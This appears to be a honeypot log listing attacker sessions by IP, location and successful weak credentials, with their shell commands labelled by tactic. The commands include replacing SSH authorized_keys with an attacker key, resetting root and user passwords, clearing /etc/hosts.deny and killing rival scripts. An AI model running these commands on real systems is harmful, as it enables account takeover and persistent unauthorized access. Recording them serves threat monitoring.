$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "warnight\nriyyf5XeoCWU\nriyyf5XeoCWU"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "warnight\nriyyf5XeoCWU\nriyyf5XeoCWU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "linux123\neqt08dLq7LAj\neqt08dLq7LAj"|passwd|bash
$ echo "linux123\neqt08dLq7LAj\neqt08dLq7LAj\n"|passwd
$ echo -e "warnight\nvaOTYERWjeuJ\nvaOTYERWjeuJ"|passwd|bash
$ echo "warnight\nvaOTYERWjeuJ\nvaOTYERWjeuJ\n"|passwd
$ echo "root:tffJpAaJ3O0X"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 dragon_root_28 (14.103.115.210) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-15 17:54 EDT Β· as root/nemesis
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:QUmehHHS98d3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 roo_root_4 (65.254.93.55) β€” Bungarribee, Australia Β· 4 sessions Β· 26 cmds
2026-05-15 16:51 EDT Β· as dbus-helper/warnight, linux/linux123, root/attitude
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "warnight\nIRx3RmoMKUog\nIRx3RmoMKUog"|passwd|bash
$ Enter new UNIX password:
$ echo "warnight\nIRx3RmoMKUog\nIRx3RmoMKUog\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 fjord (171.25.158.47) β€” Vaxjo, Sweden Β· 1 session Β· 2 cmds
2026-05-15 17:20 EDT Β· as systemd-sync/warnight
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 phantom_root_103 (43.156.212.86) β€” Singapore, Singapore Β· 3 sessions Β· 6 cmds
2026-05-15 16:53 EDT Β· as linux/linux123, root/attitude, root/deployer!123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 panda_root_37 (117.50.138.166) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-15 16:36 EDT Β· as root/h3c.com!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 phantom_root_104 (152.42.219.80) β€” Singapore, Singapore Β· 1 session Β· 2 cmds
2026-05-15 16:16 EDT Β· as root/www-data123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wraith_root_94 (190.184.222.63) β€” General Pico, Argentina Β· 1 session Β· 2 cmds
2026-05-15 15:33 EDT Β· as root/!@#$%^&
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 specter_root_96 (150.5.169.176) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 38 cmds
2026-05-15 14:24 EDT Β· as root/linux123, root/taxi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:BtGbqmu8rh7R"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:uuva1KrUytDF"|chpasswd|bash
🎭 wraith_root_95 (165.232.174.146) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-15 14:23 EDT Β· as root/linux123, root/nemesis1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:pOn8PcPUsLaf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:928MtewtVswr"|chpasswd|bash
🎭 specter_root_97 (118.179.102.248) β€” Dhaka, Bangladesh Β· 4 sessions Β· 79 cmds
2026-05-15 14:13 EDT Β· as ethan/123, mobile/mobile, root/linux123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:s9WFWt8puCpX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "mobile\n366jni4soL9g\n366jni4soL9g"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "mobile\n366jni4soL9g\n366jni4soL9g\n"|passwd
$ echo -e "taba\nhMyXpTwO3wlu\nhMyXpTwO3wlu"|passwd|bash
$ echo "taba\nhMyXpTwO3wlu\nhMyXpTwO3wlu\n"|passwd
$ echo -e "123\nnW6mfqqQ6Fof\nnW6mfqqQ6Fof"|passwd|bash
$ echo "123\nnW6mfqqQ6Fof\nnW6mfqqQ6Fof\n"|passwd
🎭 rogue_root_4 (182.48.68.82) β€” Dhaka, Bangladesh Β· 2 sessions Β· 39 cmds
2026-05-05 02:06 EDT Β· as admin/Pa55word, root/linux123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:FLC8BH1qxjLO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Pa55word\n9FbDiZ6z8VcP\n9FbDiZ6z8VcP"|passwd|bash
$ Enter new UNIX password:
$ echo "Pa55word\n9FbDiZ6z8VcP\n9FbDiZ6z8VcP\n"|passwd
🎭 bibimbap_root_12 (222.110.147.58) β€” Eunpyeong-gu, South Korea Β· 1 session Β· 19 cmds
2026-05-15 14:18 EDT Β· as root/nemesis1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:OIdJoOpgqVz7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_10 (103.183.62.1) β€” Mātuail, Bangladesh Β· 1 session Β· 20 cmds
2026-05-15 14:04 EDT Β· as taba/taba
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "taba\npAewlOOg3VRf\npAewlOOg3VRf"|passwd|bash
$ Enter new UNIX password:
$ echo "taba\npAewlOOg3VRf\npAewlOOg3VRf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 durian_root_2 (121.122.119.48) β€” Kota Bharu, Malaysia Β· 1 session Β· 19 cmds
2026-05-15 13:56 EDT Β· as root/linux123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:i5xDJAuhp0zI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_15 (69.6.251.43) β€” Vinhedo, Brazil Β· 1 session Β· 20 cmds
2026-05-15 12:51 EDT Β· as es/abc123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "abc123\nz0QtO94FQkQw\nz0QtO94FQkQw"|passwd|bash
$ Enter new UNIX password:
$ echo "abc123\nz0QtO94FQkQw\nz0QtO94FQkQw\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_88 (185.164.81.156) β€” Nisporeni, Moldova Β· 1 session Β· 9 cmds
2026-05-15 11:32 EDT Β· as root/root
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
